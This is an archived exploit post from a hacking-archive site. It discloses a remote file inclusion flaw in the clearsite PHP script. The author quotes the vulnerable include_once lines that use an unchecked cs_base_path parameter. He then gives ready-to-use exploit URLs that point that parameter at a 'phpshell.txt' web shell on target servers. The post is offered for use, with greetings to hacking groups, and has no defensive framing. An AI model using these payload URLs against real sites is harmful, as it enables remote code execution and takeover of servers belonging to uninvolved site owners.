AOH :: HP Unsorted C :: B1A-1152.HTM

clearsite Remote File Include Vulnerability



clearsite Remote File Include Vulnerability
clearsite Remote File Include Vulnerability



clearsite Remote File Include Vulnerability
                 
Script: http://sourceforge.net/projects/clearsite/ 
    name:    D0ryAn
location:    libya
website: http://www.7b-ly.com 
email: admin@7b-ly.com 




     bug:   Remote File Include Vulnerability
    
     you can find the bug in alot of files in the script for ex



device_admin.php
include_once("$cs_base_path/include/aloe/aloe_config.php");

header.php
include_once("$cs_base_path/include/header.php");  >>>> that
include_once("$cs_base_path/include/footer.php");

docs.php
include_once('include/config.php');
include_once("$cs_base_path/include/header.php");      >>>>> that
/*include_once("$cs_base_path/include/sidebar.php"); */




exploit 


http://target/clearsite/docs.php?cs_base_path=phpshell.txt? 
http://target/clearsite/admin/decice_admin.php?cs_base_path=phpshell.txt? 


thanks for all frind and http://7b-ly.com http://libya4us.com http://7ob-ly.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.